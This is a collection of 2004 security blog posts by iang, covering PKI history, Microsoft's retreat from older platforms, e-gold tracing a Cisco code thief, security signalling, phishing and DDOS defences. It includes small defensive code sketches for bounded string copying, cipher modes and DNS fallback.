    As an example of this, at a tender age, I rewrote the infamous strcpy(3) set of routines to eliminate buffer overflows. Doing so cost me a day or two of coding. But from there on in, I never had a buffer overflow, and my code was easy to audit. Massive benefit, and I preferred that to using Lint, simply because *I* knew what I was doing was much safer.
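    That original code is long gone, but a minimal sketch of the discipline - truncate-and-terminate, along the lines of what later became strlcpy(3); the function name here is mine - looks something like this:

        #include <stddef.h>

        /* Bounded copy: never writes more than size bytes into dst,
         * always NUL-terminates (when size > 0), and returns the length
         * of src so the caller can detect truncation. */
        size_t safe_strcpy(char *dst, const char *src, size_t size)
        {
            size_t srclen = 0;
            while (src[srclen] != '\0')
                srclen++;                           /* measure the source */

            if (size > 0) {
                size_t n = (srclen < size - 1) ? srclen : size - 1;
                for (size_t i = 0; i < n; i++)
                    dst[i] = src[i];                /* copy what fits */
                dst[n] = '\0';                      /* always terminate */
            }
            return srclen;                          /* >= size means truncated */
        }

    A caller writes something like: if (safe_strcpy(buf, input, sizeof buf) >= sizeof buf) then the input was truncated. With that one rule applied everywhere, a string copy simply cannot run off the end of a buffer, which is what made the code easy to audit.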

    But how to convince the world of that? I don't know ... still an open question. But, I'm glad Adam has brought up the question, and I have the chance to say "that won't work," because the answer is probably worth an extra percentage point on Microsoft's market cap, in a couple of years, maybe.


    * The code is WebFunds which is about 100kloc (kilo-lines-of-code) chock full of hard crypto, RTGS payments and various other financial cryptography applications like secure net storage and secure chat.

    Posted by iang at 09:31 AM | Comments (6) | TrackBack

    December 09, 2004

    PKI's mission: sell certs or die in the attempt!

    Back in the early 90s, some Bright Spark had the idea that if a certificate authority could sign a certificate, and this certificate could be used to secure logins, payments, emails and ... well, everything, then obviously everyone would want one. And everyone was a lot of people, even back in the days before mainstream Internet.

    There was a slight problem, though. The certificate wasn't really the only way to do things. In fact, it was one of the poorer ways to do things, because of that pesky complexity argument. But this didn't present an insurmountable challenge to our Mr. B.S., as crypto and security are devilish complex things, *however* you do them.

    All that was needed was a threat to hang the hat of certificate security on, and the rest could be written into history. This bogeyman turned out to be the wicked thief of credit cards, who would conduct a thing of great evil called a Man-In-The-Middle attack on poor innocent Internet consumers. This threat (cut to images of virginal shoppers tied to the rails before the oncoming train of rapacious gangsters) made the whole lot hang together, cohesively enough to fool all but the most skeptical security experts.

    And so PKI was born. Public Key Infrastructure involved lots of crypto, lots of complexity, lots of software, and of course, oodles and oodles of certs, all for sale. Boom! Literally, at least in stock market terms, as certificate sellers went through the Internet IPO roof.

    Their mission was to sell certs or die in the attempt, and they did. By the end of the dotcom boom, all but one of them were smoking carcasses. The one that survived cleverly used its stock market money to buy some businesses with real cash flow. But even it danced with stock prices that were 1-2% of its peak. Now it's up in the 10% range.

    Unfortunately, even though the PKI companies died exotic and flashy deaths, the mission did not. Now, one insider has crawled out from the ashes to write an anonymous article that isn't exactly waving a white flag. As he reveals his inner dreams, it's stunning to realise that this insider *still* believes that PKI can do it, even when he admits that the mission was to sell certs. How pervasive a marketing myth is that?

    Anyways, here's the link. For those students of Internet security, you be the judge: how much of the following makes sense when you consider their mission was to sell certs? How much of it makes sense if you take away that mission?


    Revenge of the PKI Nerds

    Wherein a very patient CSO hatches a plan to revive a technology thought to be dead

    BY ANONYMOUS

    I recently noticed a curious phenomenon. Public Key Infrastructure, once rumored to be dead, is making a comeback. Several high-profile institutions are now deploying a technology that I assumed had been extinct since the dot-bomb era. It's sort of technology's version of the coelacanth. This was a fish that was assumed to have been extinct for hundreds of thousands of years and then-bam!-one turns up in a fisherman's net off the coast of Madagascar.

    I admit I have a certain fondness for Public Key Infrastructure, or PKI as it is commonly known-at least that is the three-letter version. PKI is commonly described using choice four-letter words as well. That's because it came into favor-and just as ingloriously fell out of it-with the boom of the '90s.

    I should know, because I cut my security teeth on the bleeding edge of PKI. In 1992, I took a position as the director of electronic commerce with a company that sought to deploy a global certificate authority (CA) that would issue the digital certificates used to process PKI. Under our plan, all other CAs would be subordinate to us, and we would sit atop a giant pyramid scheme raking in monopoly profits by charging pennies on all the billions of e-commerce transactions around the world.

    The only problem was that other PKI companies were busy scheming with their own plans to take over the e-commerce world. While we were plotting against each other, we forgot to actually deploy the technology. After a few years of hand waving, PowerPoint presentations and whiteboard discussions, investors began demanding that we start earning our keep by making a profit. Silly realists!

    ....
    http://www.csoonline.com/read/120104/undercover.html

    Posted by iang at 04:59 PM | Comments (8) | TrackBack

    December 08, 2004

    2006, and beyond...

    Over at EmergentChaos, Adam asked what happens when "the Snail" gets 10x worse? I need several cups of coffee to work that one out! My first impressions were that ... well, it gets worse, dunnit! which is just an excuse for not thinking about the question.

    OK, so gallons of coffee and a week later, what is the natural break on the shift in the security marketplace? This is a systems theory (or "systemics" as it is known) question. Hereafter follows a rant on where it might go.

    (Unfortunately, it's a bit shambolic. Sorry about that.)

    A lot of ordinary users (right now) are investigating ways to limit their involvement with Windows due to repeated disasters with their PCs. This is the first limiting factor on the damage: as people stop using PCs on a casual basis, they switch to using them on a "must use" basis.

    (Downloading Firefox is the easy fix and I'll say no more about it.) Some of those - retail users - will switch to Macs, and we can guess that Mac might well double its market share over the next couple of years. A lot of others - development users and poorer/developing countries - will switch to the open source Unix alternates like Linux/BSD. So those guys will have a few good years of steady growth too.

    Microsoft will withdraw from the weaker marketplaces. So we have already seen them pull out of supporting older versions, and we will see them back off from trying to fight Firefox too hard (they can always win that back later on). But it will maintain its core. It will fight tooth and nail to protect two things: the Office products, and the basic windows platform.

    To do that, the bottom line is that they probably need to rewrite large chunks of their stuff. Hence the need to withdraw from marginal areas in order to concentrate on protecting that which is core, so as to concentrate efforts. So we'll see a period characterised by no growth or negative growth by Microsoft, during which the alternates will reach a stable significant percentage. But, Microsoft will come back, and this time with a more secure platform. My guess is that it will take them 2 years, but that's because everything of that size takes that long.

    (Note that this negative market growth will be accompanied by an increase in revenues for Microsoft as companies are forced to upgrade to the latest releases in order to maintain some semblance of security. This is the perversity known as the cash cow: as the life cycle ends, the cash goes up.)

    I'd go out on a limb here and predict that in 2 years, Microsoft will still control about half of the desktop market, down from about 90% today.

    There are alternates outside the "PC" mold. More people will move to PDAs/cellular/mobile phones for smaller apps like contact and communications. Pushing this move also is the effect we've all wondered about for a decade now: spam. As spam grows and grows, email becomes worse and worse. Already there is a generation of Internet users that simply do not use email: the teenagers. They are chat users and phone users.

    It's no longer the grannies who don't use email, it is now the middle-aged tech groupies (us) who are feeling more and more isolated. Email is dying. Or, at least, it is going the way of the telegram, that slow clunky way in which we send rare messages like birthday, wedding and funeral notices. People who sell email-based product rarely agree with this, but I see it on every wall that has writing on it [1] [2].

    But, I hear you say, chat and phones are also subject to all of the same attacks that are going to do Microsoft and the Internet so much damage! Yes, it's true, they are subject to those attacks, but they are not going to be damaged in the same way. There are two reasons for this.

    Chat users are much much more comfortable with many many identities. In the world of instant messaging, Nyms are king and queen and all the other members of the royal family at the same time. The same goes for the mobile phone world; there has been a seismic shift in that world over to prepaid billing, which also means that an identity that is duff or a phone that is duff can simply be disposed of, and a new one set up. Some people I know go through phones and SIMs on a monthly basis.

    Further, unlike email, there are multiple competing systems for both the phone platform and the IM platform, so we have a competition of technologies. We never had that in email, because we had one standard and nobody really cared to compete; but this time, as hackers hit, different technologies can experiment with different solutions to the cracks in different ways. The one that wins will attract a few percentage points of market share until the solution is copied. So the result of this is that the much lauded standardisation of email and the lack of competition in its basic technical operability is one of the things that will eventually kill it off.

    In summary so far; email is dying, chat is king, queen, and anyone you want to be, and your mobile/cellular is your pre-paid primary communications and management device.

    What else? Well, those who want email will have to pay *more* for it, because they will be the shrinking few who consume all the bandwidth with their spam. Also, the p2p space will save us from the identity crisis by inventing the next wave of commerce based on the nym. Which means that we can write off the Hollywood blockbuster for now.

    Shambolic, isn't it!

    [1] "Scammers Exploit DomainKeys Anti-phishing Weapon"
    http://story.news.yahoo.com/news?tmpl=story2&u=/zd/20041129/tc_zd/139951
    [2] "Will 2005 be the year of the unanswered e-mail message?"
    http://www.iht.com/bin/print_ipub.php?file=/articles/2004/12/06/business/netfraud.html

    Posted by iang at 08:45 AM | Comments (5) | TrackBack

    December 07, 2004

    Microsoft proceeds with strategic withdrawal

    In the military classroom, we teach 4 phases of war, one of which is "Withdrawal" (the others are Attack, Advance, Defence). One of the reasons for withdrawing is that the terrain cannot be defended, and thus we withdraw to terrain that can be defended. It's all fairly common sense stuff, but we are up against an inbuilt fear in all politicians and not a few soldiers that withdrawal is retreat and retreat is failure.

    Sometimes it is necessary to give up ground. Microsoft are now in that position. They are over extended on platforms, and need to back away from support of all older versions of the OS, if they are to have any chance of fielding a secure OS in the next couple of years. More evidence of this withdrawal is now coming to light:

    http://www.eweek.com/article2/0,1759,1736395,00.asp
    http://www.techworld.com/opsys/news/index.cfm?NewsID=2760

    These two articles discuss the withdrawal of support from various products, for security reasons. For Microsoft, the defensible terrain is Windows XP. Or, at least, that's their strategy!

    Posted by iang at 04:33 PM | Comments (1) | TrackBack

    November 05, 2004

    e-gold to track Cisco extortioner

    In line with my last post about using payment systems to stupidly commit crimes, here's what's happening over in the hacker world. In brief, some thief is trying to sell some Cisco source code he has stolen, and decided to use e-gold to get the payout. Oops. Even though e-gold has a reputation for being a den of scammers, any given payment can be traced from woe to go. All you have to do is convince the Issuer to do that, and in this case, e-gold has a widely known policy of accepting any court order for such work.

    The sad thing about these sorts of crooks and crimes is that we have to wait until they've evolved by self destruction to find out the really interesting ways to crack a payment system.


    E-gold Tracks Cisco Code Thief
    November 5, 2004 By Michael Myser

    The electronic currency site that the Source Code Club said it will use to accept payment for Cisco Systems Inc.'s firewall source code is confident it can track down the perpetrators.

    Dr. Douglas Jackson, chairman of E-gold Ltd., which runs www.e-gold.com, said the company is already monitoring accounts it believes belong to the Source Code Club, and there has been no activity to date.

    "We've got a pretty good shot at getting them in our system," said Jackson, adding that the company formally investigates 70 to 80 criminal activities a year and has been able to determine the true identity of users in every case.

    On Monday, a member of the Source Code Club posted on a Usenet group that the group is selling the PIX 6.3.1 firewall firmware for $24,000, and buyers can purchase anonymously using e-mail, PGP keys and e-gold.com, which doesn't confirm identities of its users.

    "Bad guys think they can cover their tracks in our system, but they discover otherwise when it comes to an actual investigation," said Jackson.

    The purpose of the e-gold system, which is based on 1.86 metric tons of gold worth the equivalent of roughly $25 million, is to guarantee immediate payment, avoid market fluctuations and defaults, and ease transactions across borders and currencies. There is no credit line, and payments can only be made if covered by the amount in the account. Like the Federal Reserve, there is a finite value in the system. There are currently 1.5 million accounts at e-gold.com, 175,000 of those Jackson considers "active."

    To have value, or e-gold, in an account, users must receive a payment in e-gold. Often, new account holders will pay cash to existing account holders in return for e-gold. Or, in the case of SCC, they will receive payment for a service.

    The only way to cash out of the system is to pay another party for a service or cash trade, which Jackson said creates an increasingly traceable web of activity.

    He did offer a caveat, however: "There is always the risk that they are clever enough to figure out an angle for offloading their e-gold in a way that leads to a dead end, but that tends to be much more difficult than most bad guys think."

    This is all assuming the SCC actually receives a payment, or even has the source code in the first place.

    It's the ultimate buyer beware-the code could be made up, tampered with or may not exist. And because the transaction through e-gold is instantaneous and guaranteed, there is no way for the buyer to back out.

    Dave Hawkins, technical support engineer with Radware Inc. in Mahwah, N.J., believes SCC is merely executing a publicity stunt.

    "If they had such real code, it's more likely they would have sold it in underground forums to legitimate hackers rather than broadcasting the sale on Usenet," he said. "Anyone who did have the actual code would probably keep it secret, examining it to build private exploits. By selling it, it could find its way into the public, and all those juicy vulnerabilities [would] vanish in the next version."

    "There's really no way to tell if this is legitimate," said Russ Cooper, senior scientist with security firm TruSecure Corp. of Herndon, Va. Cooper, however, believes there may be a market for it nonetheless. By posting publicly, SCC is able to get the attention of criminal entities they otherwise might not reach.

    "It's advertising from one extortion team to another extortion team," he said. "These DDOS [distributed denial of service] extortionists, who are trying to get betting sites no doubt would like to have more ways to do that."

    Posted by iang at 11:38 AM | Comments (1) | TrackBack

    October 28, 2004

    Encrypt everything...

    AlertBox, the soapbox of one Jakob Nielsen, has had enough of nonsense security prescriptions. Its 25th October entry says:

    "Internet scams cannot be thwarted by placing the burden on users to defend themselves at all times. Beleaguered users need protection, and the technology must change to provide this."

    Sacrilege! Infamy! How can this rebel break ranks to suggest anything other than selling more crypto and certs and solutions to the users?

    Yet, others agree. Cory Doctorow says Nielsen is cranky, but educating the users is not going to solve security issues, and "our tools conspire against us to make us less secure...." Mitch Wagner agrees, saying that "much security is also too complicated for most users to understand."

    And they all three agree on Nielsen's first recommendation:

    "Encrypt all information at all times, except when it's displayed on the screen. In particular, never send plaintext email or other information across the Internet: anything that leaves your machine should be encrypted."

    Welcome to the movement.

    Posted by iang at 08:32 AM | Comments (3) | TrackBack

    October 23, 2004

    Security Signalling - sucking on the lemon

    Over on Adam's blog, he asks the question, how do we signal security? Have a read of that if you need to catch up on what is meant by signalling, and what the market for lemons is.

    It's a probing question. In fact, it goes right to the heart of security's dysfunctionalism. I don't think I can answer it. But, glutton for punishment that I am, here are some thoughts.

    Signalling that "our stuff is secure" is fairly routine. As Adam suggests, we write blogs and thus establish a reputation that could be blackened if our efforts were not secure. Also, we participate in security forums, and pontificate on matters deep and cryptographic. We write papers, and we write stuff that we claim is secure. We publish our code in open source form. (Some say that's an essential signal, but it only makes a difference if anybody reads it with the view to checking the security. In practice, that simply doesn't happen often enough to matter in security terms, but at least we took the risk.)

    All that amounts to us saying we grow peaches, nothing more. Then there are standards. I've employed OpenPGP for this purpose, primarily, but we've also used x.509. Also, it's fairly routine to signal our security by stating our algorithms. We use SHA1, triple DES, DSA, RSA, and I'm now moving over to AES. All wonderful acronyms that few understand, but many know that they are the "safe" ones.

    Listing algorithms also points out the paucity of that signal: it still leaves aside how well you use them! For imponderable example, DES used in "ECB mode" achieves one result, whereas the same DES in "CBC mode" achieves quite another. How many know the difference? It's not a great signal if it is that easy to confuse.
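
    To make that concrete, here's a small demonstration of my own - nothing to do with any vendor above - using the Python "cryptography" package, and AES rather than DES for convenience; the lesson is identical. Two equal plaintext blocks leak straight through ECB mode, and don't through CBC:

        import os
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

        key, iv = os.urandom(16), os.urandom(16)
        pt = b"ATTACK AT DAWN!!" * 2   # two identical 16-byte blocks

        ecb = Cipher(algorithms.AES(key), modes.ECB()).encryptor()
        cbc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
        ct_ecb = ecb.update(pt) + ecb.finalize()
        ct_cbc = cbc.update(pt) + cbc.finalize()

        print(ct_ecb[:16] == ct_ecb[16:])   # True: ECB repeats itself, leaking structure
        print(ct_cbc[:16] == ct_cbc[16:])   # False: CBC chains blocks, hiding repetition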

    So the next level of signalling is to use packages of algorithms. The most famous of these are PGP for email, SSL for browsing, and SSH for Unix administration. How strong are these? Again, it seems to come down to "when used wisely, they are good." Which doesn't imply that the use of them is in any way wise, and doesn't imply that their choice leads to security.

    SSL in particular seems to have become a watchword for security, so much so that I can pretty much guarantee that I can start an argument by saying "I don't use SSL because it doesn't add anything to our security model." From my point of view, I'm signalling that I have thought about security, but from the listener's point of view, only a pagan would so defile the brand of SSL.

    Brand is very important, and can be a very powerful signal. We all wish we could be the one big name in peach valley, but only a few companies or things have the brand of security. SSL is one, as above. IBM is another. Other companies would like to have it (Microsoft, Verisign, Sun) but for one reason or another they have failed to establish that particular brand.

    So what is left? It would appear that there are few positive signals that work, if only because any positive signal that arises gets quickly swamped by the masses of companies lining up for placebo security sales. Yes, everyone knows enough to say "we do AES, we recommend SSL, and we can partner with IBM." So these are not good signals as they are too easy to copy.

    Then there are negative signals: I haven't been hacked yet. But this again is hard to prove. How do we know that you haven't been? How do you know? I know one particular company that ran around the world telling everyone that they were the toppest around in security, and all the other security people knew nothing. (Even I was fooled.) Then they were hacked, apparently lost half a mil in gold, and it turned out that the only security was in the minds of the founders. But they kept that bit quiet, so everyone still thinks they are secure...

    "I've been audited as unhackable" might be a security signal. But, again, audit companies can be purchased to say whatever is desired; I know of a popular company that secures the planet with its software (or, would like to) that did exactly that - bought an audit that said it was secure. So that's another dead signal.

    What's left may well be that of "I'm being attacked." That is, right now, there's a hacker trying to crack my security. And I haven't lost out yet.

    That might seem like sucking on a lemon to see if it is sour, but play the game for a moment. If instead of keeping quiet about the hack attacks, I reported the daily crack attempts, and the losses experienced (zero for now), that indicates that some smart cookie has not yet managed to break my security. If I keep reporting that, every day or every month, then when I do get hacked - when my wonderful security product gets trashed and my digital dollars are winging it to digital Brazil - I'm faced with a choice:

    Tell the truth, stop reporting, or lie.

    If I stop reporting my hacks, it will be noticed by my no longer adoring public. Worse, if I lie, there will be at least two people who know it, and probably many more before the day is out. And my security product won't last if I've been shown to lie about its security.

    Telling the truth is the only decent result of that game, and that then forces me to deal with my own negative signal. Which results in a positive signal - I get bad results and I deal with them. The alternatives become signals that something is wrong, so any way out, sucking on the lemon will eventually result in a signal as to how secure my product is.

    Posted by iang at 11:40 AM | Comments (1) | TrackBack

    October 09, 2004

    SANS - top 20 solutions confirms no solution for phishing yet!

    Reading the new SANS list of top 20 vulnerabilities leaves one distinctly uncomfortable. It's not that it is conveniently sliced into top 10s for Unix and Microsoft Windows, I see that as a practical issue when so much of the world is split so diametrically.

    The bias is what bothers. The Windows side is written with excruciating care to avoid pointing any blame at Microsoft. For example, wherever possible, general cases are introduced with lists of competing products, before concentrating on how it afflicts Microsoft product in particular. Also, the word Microsoft appears only with positive connotations: you have this Microsoft security tool, whereas you have a buggy Windows application.

    One would think that such a bias is just a reflection of SANS' use of institutions and vendors as the source of its security info. For example, "p2p file sharing" is now alleged to be a "vulnerability" which has to be a reflection of the FBI responding to the RIAA over falling sales of CD music.

    But what did strike me as totally weird was that phishing wasn't mentioned!

    Huh? Surely there can't be a security person on the planet who hasn't heard of phishing and realised that it's one of the top serious issues? Why would SANS not list it as a vulnerability? Is the FBI too busy worrying about Hollywood's bottom lines to concentrate on theft from banks and other payment operators?

    The answer is, I think, that the list only includes stuff for which there is a solution. Looking at the website confirms that SANS sells solutions. Scads of them, in fact. Well, it can't sell a solution for phishing because ... there isn't a solution to be sold. Not yet, at least.

    Which is to say that the list is misnamed: it's the top 20 solutions we can sell you. SANS says they are "The Trusted Source for Computer Security Training, Certification and Research" and it's unlikely that they can instill that trust in their customers if they teach about a vulnerability they can't also solve.

    No doubt they are working on one, as are hundreds of other security vendors. But it does leave one wondering how we go about securing the net when security itself is coopted to other agendas.

    Posted by iang at 07:51 AM | Comments (2) | TrackBack

    October 04, 2004

    Amit Yoran - cybersecurity czar - resigns!

    It was an impossible task anyway, and more kudos to Amit Yoran for resigning. News that he has quit the so-called "cybersecurity czar" position in the US means that one more person is now available to do good security work out in the private sector.

    When it comes to securing cyberspace, we can pretty much guarantee that the less the government (any, you pick) does the better. They will always be behind the game, and always subject to massive pressure from large companies selling snake oil. Security is a game where you only know when you fail, which makes it strongly susceptible to brand, hype, finger pointing and other scams.

    There is one thing that the government (specifically, the US federal government this time) could have done to seriously improve our chances of a secure net, and that was to get out of crypto regulation. There was no movement on that issue, so crypto remains in this sort of half-bad half-good limbo area of weakened regulatory controls (open software crypto is .. free, but not the rest). The result of the January 2000 easing was as planned (yes, this is documented strategy): it knocked the stuffing out of the free community's independent push, while still leaving real product skipping crypto because of the costs.

    IMNSHO the reason we have phishing, rampant hacking, malware, and countless other plagues is because the US government decided back in days of post-WWII euphoria that people didn't need crypto. Think about it: we built the net, now why can't we secure it?

    For about 60 years or more, any large company getting into crypto has had to deal with .. difficulties. (Don't believe me, ask Sun why they ship Java in "crippled mode.") This is called "barriers to entry" which results in a small group of large companies arising to dominate the field, which further sets the scene for expensive junk masquerading as security.

    In the absence of barriers to entry, we'd expect knowledge to be dispersed and acted upon in a regular fashion, just like the rest of the net's intellectual capital. Yet, any specialist has to run the gauntlet of .. issues of integrity. Work on free stuff and starve, or join a large company and find yourself polishing hypeware with snake oil.

    Of course it's not as bad as I make out. But neither is it as good as some claim it. Fact is, crypto is not deployed like relational databases, networking protocols, virtual machine languages or any of the other 100 or so wonderful and complex technologies we developed, mastered and deployed in the free world known as the Internet. And there's no good reason for that, only bad reasons: US government policy remains anti-crypto, which means US government policy is to not have a secure Internet.

    ==============================

    'Frustrated' U.S. Cybersecurity Chief Abruptly Resigns

    POSTED: 11:32 AM EDT October 1, 2004
    WASHINGTON -- The government's cybersecurity chief has abruptly resigned after one year with the Department of Homeland Security, confiding to industry colleagues his frustration over what he considers a lack of attention paid to computer security issues within the agency.

    Amit Yoran, a former software executive from Symantec Corp., informed the White House about his plans to quit as director of the National Cyber Security Division and made his resignation effective at the end of Thursday, giving a single day's notice of his intention to leave.

    Yoran said Friday he "felt the timing was right to pursue other opportunities." It was not immediately clear who might succeed him, even temporarily. Yoran's deputy is Donald "Andy" Purdy, a former senior adviser to the White House on cybersecurity issues.

    Yoran has privately described frustrations in recent months to colleagues in the technology industry, according to lobbyists who recounted these conversations on condition they not be identified because the talks were personal.

    As cybersecurity chief, Yoran and his division - with an $80 million budget and 60 employees - were responsible for carrying out dozens of recommendations in the Bush administration's "National Strategy to Secure Cyberspace," a set of proposals to better protect computer networks.

    Yoran's position as a director -- at least three steps beneath Homeland Security Secretary Tom Ridge -- has irritated the technology industry and even some lawmakers. They have pressed unsuccessfully in recent months to elevate Yoran's role to that of an assistant secretary, which could mean broader authority and more money for cybersecurity issues.

    "Amit's decision to step down is unfortunate and certainly will set back efforts until more leadership is demonstrated by the Department of Homeland Security to solve this problem," said Paul Kurtz, a former cybersecurity official on the White House National Security Council and now head of the Washington-based Cyber Security Industry Alliance, a trade group.

    Under Yoran, Homeland Security established an ambitious new cyber alert system, which sends urgent e-mails to subscribers about major virus outbreaks and other Internet attacks as they occur, along with detailed instructions to help computer users protect themselves.

    It also mapped the government's universe of connected electronic devices, the first step toward scanning them systematically for weaknesses that could be exploited by hackers or foreign governments. And it began routinely identifying U.S. computers and networks that were victims of break-ins.

    Yoran effectively replaced a position once held by Richard Clarke, a special adviser to President Bush, and Howard Schmidt, who succeeded Clarke but left government during the formation of the Department of Homeland Security to work as chief security officer at eBay Inc.

    Yoran co-founded Riptech Inc. of Alexandria, Va., in March 1998; the company monitored government and corporate computers around the world with an elaborate sensor network to protect against attacks. He sold the firm in July 2002 to Symantec for $145 million and stayed on as vice president for managed security services.

    Copyright 2004 by The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.


    Addendum: 2004.10.07: The administration's rapid response: Cybersecurity expert Howard Schmidt returning to DHS

    Posted by iang at 06:33 PM | Comments (1) | TrackBack

    October 02, 2004

    Identity theft - buy a Mac, download Firefox

    In the "war on phishing" which has yet to be declared, there is little good news. It continues to increase, identity theft is swamping the police departments, and obscure efforts by the RIAA to assert that CD pirating is now linked to financing of terrorism grab the headlines [1]. Here's a good article on the victims, and the woe that befalls the common man of the net, while waiting for something to be done about it [2].

    Meantime, what to do? Phishing won't stop until the browser manufacturers - Microsoft, Mozilla, Konqueror, Opera - accept that it's an attack on the browser. The flood of viruses on Microsoft's installed base won't change any time soon either, as underscored by the SP2 message: Microsoft has shown there is no easy patch for a fundamentally broken system.

    Don't hold your breath, it will take years. In the meantime, the only thing I can think of for the embattled ordinary user is this: buy a Mac and download Firefox. That won't stop the phishing, but at least they are sufficiently inured against viruses that you won't have to worry about that threat.

    [1] http://go.theregister.com/news/2004/09/28/terrorist_email_scams/
    [2] http://www.theregister.co.uk/2004/09/24/identity_snatchers/


    Invasion of the identity snatchers
    By Kelly Martin, SecurityFocus (kel at securityfocus.com)
    Published Friday 24th September 2004 11:32 GMT

    Last year I was the victim of identity theft, a sobering reality in today's world. An unscrupulous criminal managed to social engineer his way past the formidable security checks and balances provided by my credit card company, my bank, and one of my investment accounts. He methodically researched my background and personal information until he could successfully impersonate me, and then subsequently set forth to change the mailing addresses of my most important financial statements.

    It was a harrowing experience, and one worth explaining in the context of the online world. Numerous visits to the local police and the Canadian RCMP revealed some rather surprising things: identity theft is already so common that there are entire units within law enforcement that deal with this issue every day. They have toll-free numbers, websites and documents that clearly define their incident response procedures. But the reality is, law enforcement will respond to these issues just as you might expect: with phone calls, in-person interviews, and some traditional detective work. It's still very much an analog world around us.

    The other thing that became crystal clear during the process of regaining my own identity is this: for as capable as they may be, law enforcement is woefully ill-equipped to track down identity theft that starts online. As a security professional with a healthy dose of paranoia, I was confident that my online identity had not been compromised - a more traditional approach had been used. But with the sophistication of today's viruses, millions of others cannot say the same thing.

    While not all identity theft starts online, the fact is that online identity theft is now incredibly easy to do. The same methodical, traditional approach that was used to steal my identity by placing phone calls is being sped up, improved upon, and made ever more lethal by first attacking the victim online. Your banking and credit card information can come later.

    We all know how commonplace these technologies already are: keyloggers, Trojans with remote-control capabilities and even webcam control, and backdoors that give access to all your files. There are millions of these installed on infected machines all over the world, lurking in the shadows.

    Ever do your taxes on your home computer? All it takes is one Social Insurance Number (or Social Security Number in America), plus some really basic personal information, and you're sunk. Every nugget of information can be worth its weight in gold if, for example, that online banking password that was just logged enables someone to change your address and then, a month later, take out a loan in your name.

    The rise of phishing scams over the past two years alludes to this growing menace: your personal information, especially your banking and credit card information, has significant value to a criminal. No surprise there.

    Working in the security field, many of us know people who are regularly infected with viruses, worms, Trojans. When it gets bad enough, they reformat and reinstall. I can't count the number of times I've heard people tell me that they're not overly concerned, as they believe that the (often, minimal) personal information on their computer is not inherently valuable. They've clearly never had their personal information put to ill use.

    As I was reading the new Threat Report from Symantec, which documents historical virus trends, only the biggest numbers jumped out at me. The average time from vulnerability to exploit is now just 5.8 days. Some 40 per cent of Fortune 100 companies had been infected with worms over a period of six months. There were 4,496 new Microsoft Windows viruses discovered in six months, or an average of 24 new viruses every day. Basically, the epidemic is out of control.

    With a few exceptions, however, the most popular and most prominent viruses and worms are not the ones that will be used to steal your identity. It's that carefully crafted email, or that feature-rich and bloated Trojan, that will be used in covert attempts.

    Perhaps a suitable solution to the epidemic is a rather old one, and one that I employ myself: encryption of all the personal data that is deemed valuable. I'm not talking about your pictures of Aunt Tilly or your music archive - I'm referring to your tax returns, your financial information, your bill payments, etc. This approach still won't avoid the keyloggers or that remote control Trojan that's sitting on your drive, but it does help to avoid new surprises and mistaken clicks.

    And to those users out there whom we deal with every day and who still say there's nothing important on their computer that requires them to care about today's worms, Trojans, viruses, and so on: the day their own information is stolen and used against them draws ever nearer.

    Copyright © 2004, SecurityFocus (http://www.securityfocus.com/)

    Posted by iang at 10:22 AM | Comments (4) | TrackBack

    September 28, 2004

    The DDOS dilemma - change the mantra

    The DDOS (distributed denial of service) attack is now a mainstream threat. It's always been a threat, but in some sense or other, it's been possible to pass it off. Either it happens to "those guys" and we aren't affected. Or, the nuisance factor of some hacker launching a DOS on our ISP is dealt with by waiting.

    Or we do what the security folks do, which is to say we can't do anything about it, so we won't. Ignoring it is the security standard. I've been guilty of it myself, on both sides of the argument: Do X because it would help with DOS, to which the response is, forget it, it won't stop the DOS.

    But DOS has changed. First to DDOS - distributed denial of service. And now, over the last year or two, DDOS has become so well institutionalised that it is a frequent extortion tool.

    Authorize.Net, a processor of credit cards, suffered a sustained extortion attack last week. The company has taken a blow as merchants have deserted in droves. Of course, they need to, because they need their payments to keep their own businesses alive. This signals a shift in Internet attacks to a systemic phase - an attack on a payment processor is an attack on all its customers as well.

    Hunting around for some experience, Gordon of KatzGlobal.com gave this list of motives for DDOS:

    Great list, Gordon! He reports that extortion attacks run at about 1 in 100 of normal DDOS activity, and I'm not sure whether to be happier or more worried.

    So what to do about DDOS? Well, the first thing that has to be addressed is the security mantra of "we can't do anything about it, so we'll ignore it." I think there are a few things to do.

    Firstly, change the objective of security efforts from "stop it" to "not make it worse." That is, a security protocol, when employed, should work as well as the insecure alternative when under DOS conditions. And thus, the user of the security protocol should not feel the need to drop the security and go for the insecure alternative.

    Perhaps better put as: a security protocol should be DOS-neutral.

    Connection-oriented security protocols have this drawback - SSL and SSH both add delay to the opening of their secure connection from client to server. Packet-oriented or request-response protocols should not, if they are capable of launching with all the crypto included in one packet. For example, OpenPGP mail sends one mail message, which is exactly the same as if it were a cleartext mail. (It's not even necessarily bigger, as OpenPGP mails are compressed.) OpenPGP is thus DOS-neutral.

    This makes sense, as connection-oriented protocols are bad for security and reliability. About the best thing you can do if you are stuck with a connection-oriented architecture is to turn it immediately into a message-based architecture, so as to minimise the cost. And, from a DOS pov, it seems that this would bring about a more level playing field.

    A second thing to look at is to be DNS-neutral. This means not being slavishly dependent on DNS to convert one's domain names (like www.financialcryptography.com) into the IP number (like 62.49.250.18). Old timers will point out that this still leaves one open to an IP-number-based attack, but that's just the escapism we are trying to avoid. Let's close up the holes and look at what's left; a sketch of the idea follows.
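
    As a rough sketch of what DNS-neutral might mean in code - my assumptions, not a spec: keep a pinned list of last-known-good IP numbers, resolve normally when DNS answers, and fall back to the pins when it doesn't. The addresses here are illustrative only.

        import socket

        PINNED = {"www.financialcryptography.com": ["62.49.250.18"]}

        def resolve(host):
            try:
                infos = socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
                ips = [info[4][0] for info in infos]
                PINNED[host] = ips           # refresh the pins on every success
                return ips
            except socket.gaierror:
                return PINNED.get(host, [])  # DNS down or poisoned: use the pins

        print(resolve("www.financialcryptography.com"))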

    Finally, I suspect there is merit in make-work strategies in order to further level the playing field. Think of hashcash. Here, a client does some terribly boring and long calculation to find a valid hash with a particular pattern - a partial collision, say a run of leading zero bits. Because secure message digests are generally random in their appearance, finding one that is not is lots of work.

    So how do we use this? Well, one way to flood a service is to send in lots of bogus requests. Each of these requests has to be processed fully, and if you are familiar with the way servers are moving, you'll understand the power needed for each request. More crypto, more database requests, that sort of thing. It's easy to flood them by generating junk requests, which is far easier to do than to generate a real request.

